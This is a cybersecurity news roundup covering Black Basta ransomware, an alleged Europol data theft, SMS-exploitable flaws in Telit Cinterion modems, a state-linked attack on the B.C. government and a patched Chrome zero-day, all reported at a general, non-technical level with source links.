Cyber Roundup
Welcome to this week’s edition of the “Bi-Weekly Cyber Roundup” by Canary Trap. At Canary Trap, it is our mission to keep you up-to-date with the most crucial news in the world of cybersecurity and this bi-weekly publication is your gateway to the latest news.
In this week’s roundup, we’ll start by recapping the activities of the Black Basta ransomware group. Following that, we’ll cover a Europol data breach, where the stolen data is now up for auction. Additionally, we’ll uncover a critical security vulnerability in a widely used modem. We’ll also explore the recent cyberattack on B.C.’s government and identify the responsible party. Lastly, we’ll learn about the zero-day vulnerability in Chrome that was addressed by Microsoft.
- Black Basta Ransomware Hit Over 500 Organizations
The Black Basta ransomware group has hit more than 500 organizations globally, including critical infrastructure entities in North America, Europe, and Australia, the US government warns.
First identified in April 2022, Black Basta has been operating under the ransomware-as-a-service (RaaS) business model, where affiliates conduct cyberattacks, deploy malware against victim organizations, and collect a percentage of the ransom payment. In a November 2023 report, blockchain analytics firm Elliptic estimated that Black Basta affiliates had received over $100 million in ransom payments from at least 90 victim organizations. According to a new alert from CISA, the FBI, the Department of Health and Human Services (HHS), and the Multi-State Information Sharing and Analysis Center (MS-ISAC), Black Basta affiliates have conducted attacks against 12 out of 16 critical infrastructure sectors, including healthcare organizations.
For initial access, the cybercriminals rely on phishing and the exploitation of known vulnerabilities, such as CVE-2024-1709, a critical ConnectWise ScreenConnect flaw that started being exploited only days after it was publicly disclosed on February 19. After compromising a victim’s network, the attackers deploy various tools for remote access, network scanning, lateral movement, privilege escalation, and data exfiltration, including SoftPerfect, BITSAdmin, PsExec, Mimikatz, and RClone.
The Black Basta affiliates were also observed exploiting vulnerabilities such as ZeroLogon, NoPac, and PrintNightmare for privilege escalation, abusing Remote Desktop Protocol (RDP) for lateral movement, and deploying the Backstab tool to disable endpoint detection and response (EDR) solutions. After exfiltrating the victim’s data, the attackers delete volume shadow copies to hinder recovery, deploy ransomware to encrypt the compromised systems, and drop a ransom note.
The new alert from CISA, FBI, HHS, and MS-ISAC provides details on the tactics, techniques, and procedures (TTPs) employed by Black Basta affiliates, indicators of compromise (IoCs), and recommended mitigations.
Government agencies note that Healthcare organizations are attractive targets for cybercrime actors due to their size, technological dependence, access to personal health information, and unique impacts from patient care disruptions. The authoring organizations urge the HPH sector and all critical infrastructure organizations to apply the recommendations in the mitigations section to reduce the likelihood of compromise from Black Basta and other ransomware attacks.
- Europol Confirms Incident Amid Alleged Auction of Staff Data
Europol is currently investigating claims made by a cybercriminal regarding the theft of confidential data from several of the agency’s sources. While the specific details of the breach remain under scrutiny, it has been confirmed that the Europol Platform for Experts (EPE) is a central focus of the incident, leading to its maintenance shutdown since May 10. However, Europol asserts that no operational data has been compromised, and core systems remain unaffected.
The cybercriminal, known as IntelBroker, has previously claimed responsibility for various high-profile breaches, including attacks on the Pentagon and national security agencies. In this instance, IntelBroker purportedly accessed Europol data designated as classified and for official use only, including source code and alliance employees’ information.
Moreover, the breach allegedly extends to other divisions within Europol, such as the European Cybercrime Centre (EC3) and the Partnership on Climate Change and Sustainable Energy (CCSE), along with the SIRIUS project. Samples of leaked data provided by IntelBroker include screenshots of the EPE platform and discussions between law enforcement and SIRIUS officers. The leaked data also includes a comprehensive list of users of the EC3 secure messaging feature, containing personal details such as full names, job titles, and areas of expertise. IntelBroker has claimed to have sold the stolen data, accepting offers via direct message on BreachForums and payment solely in Monero.
This incident comes on the heels of a separate data exposure at the European Parliament, where data from its PEOPLE recruitment app was compromised. Staff members were advised to change their passwords and remain vigilant against potential scams.
Despite Europol’s ongoing investigation, further details about the breach remain undisclosed. However, these incidents underscore the persistent threat posed by cybercriminals to sensitive government agencies and institutions across the European Union, necessitating enhanced cybersecurity measures and proactive defense strategies to mitigate risks effectively.
- Widely Used Modems in Industrial IoT Devices Open to SMS Attack
Security researchers from Kaspersky’s ICS CERT division unveiled a series of critical security flaws in Telit Cinterion cellular modems, which are extensively utilized across industrial, healthcare, and telecommunications sectors. These vulnerabilities, disclosed in November 2023, expose a range of risks, including the potential for remote attackers to execute arbitrary code via SMS.
The most severe vulnerability, CVE-2023-47610, involves a heap overflow issue in the modem’s User Plane Location (SUPL) message handlers, earning a severity score of 8.8 and 9.8 according to Kaspersky and NIST, respectively. Exploiting this flaw via specially crafted SMS messages grants attackers remote access to the modem’s operating system, allowing manipulation of RAM and flash memory without authentication or physical access.
While other vulnerabilities identified by Kaspersky received lower severity scores, they still pose significant risks, particularly in compromising the integrity of Java-based applications (MIDlets) and bypassing digital signature checks. This could lead to code execution with elevated privileges, threatening data confidentiality, network security, and device integrity. The impact of these vulnerabilities extends beyond the Cinterion EHS5-E series modem to various other Telit products with similar software and hardware architecture, including Cinterion BGS5, EHS5/6/7, PDS5/6/8, ELS61/81, and PLS62. Despite some patches issued by Telit, several vulnerabilities remain unaddressed, raising concerns about widespread disruption across sectors.
To mitigate these threats, Kaspersky recommends collaborating with telecom operators to disable SMS sending to affected devices and utilize securely configured private APNs. Enforcing application signature verification and implementing measures to prevent unauthorized physical access are also crucial steps in enhancing security. Evgeny Goncharov, head of Kaspersky ICS CERT, emphasizes the challenge of identifying impacted products due to the modems’ integration into other solutions. The widespread deployment of these devices underscores the urgent need for proactive security measures and collaboration among stakeholders to safeguard against potential cyber threats and mitigate the risk of extensive global disruption.
- State or State-Sponsored Actor Was Behind B.C. Government Cyber Attack
The B.C. government faced a sophisticated cyber attack orchestrated by a state or state-sponsored actor, revealed Shannon Salter, head of B.C.’s public service. The breach, known since April 10, was confirmed by online security experts the following day. Premier David Eby was briefed on April 17, while a subsequent attempt by the same threat actor was discovered on April 29. Despite the attack’s sophistication, there’s no evidence of compromised sensitive personal information, according to Public Safety Minister Mike Farnworth. However, specifics regarding the accessed information and indicators of a state-sponsored attack remain undisclosed.
The decision to delay public disclosure until May 8 sparked criticism, with accusations of concealment from B.C. United MLAs. Salter defended the delay, citing cybersecurity advice to avoid alerting other hackers to government network vulnerabilities. The incident involved three cybersecurity attempts, all aimed at concealing the hackers’ tracks.
Eric Li, a cybersecurity specialist at the University of British Columbia, questioned the delay in prompting public servants to change their passwords. He highlighted the challenge of monitoring remote workers’ connections to lower-security Wi-Fi systems amidst the pandemic-induced surge in telecommuting.
The extent of the attack, analyzed through 40 terabytes of data, remains under investigation. The motive behind the attack, including potential targeting of specific government records, remains unclear. Despite the absence of a ransom demand, the breach raises concerns about the security of millions of British Columbians’ personal data, including social insurance numbers.
Although Microsoft’s warning of Russian-backed hackers targeting U.S. federal agencies has raised speculation, B.C. officials refrain from confirming any links. Farnworth emphasized the province’s cybersecurity measures, boasting 76 cybersecurity experts and an annual $25 million investment in cybersecurity efforts.
- Exploited Chrome Zero-Day Patched by Google
On Thursday, Google released Chrome 124 update, addressing a zero-day vulnerability, CVE-2024-4671, which the tech giant reports is actively exploited in the wild. This high-severity use-after-free bug affects the Visuals component and was reported by an anonymous researcher on May 7. Impressively, Google developed and deployed the patch within just two days.
However, Google’s advisory lacks details on any bug bounty associated with CVE-2024-4671, and there’s no information available on the specific attacks exploiting this vulnerability. Yet, given Chrome’s history, it’s not uncommon for commercial spyware vendors to target such vulnerabilities. The patched versions, Chrome 124.0.6367.201/.202 for Mac and Windows, and Chrome 124.0.6367.201 for Linux, address CVE-2024-4671. Notably, this isn’t the first exploited Chrome vulnerability of 2024; CVE-2024-0519 was patched in January.
A recent report by Google and Mandiant revealed a concerning trend, with 97 zero-day vulnerabilities exploited in 2023—a 50% increase from the previous year. Among these, eight targeted Chrome, with spyware vendors responsible for 75% of known zero-day exploits affecting Google products and Android ecosystem devices in 2023.
References:
- https://www.securityweek.com/black-basta-ransomware-hit-over-500-organizations/
- https://www.theregister.com/2024/05/13/europol_data_breach/
- https://www.bleepingcomputer.com/news/security/widely-used-modems-in-industrial-iot-devices-open-to-sms-attack/
- https://vancouversun.com/news/local-news/state-or-state-sponsored-actor-was-behind-b-c-government-cyber-attack
- https://www.securityweek.com/exploited-chrome-zero-day-patched-by-google/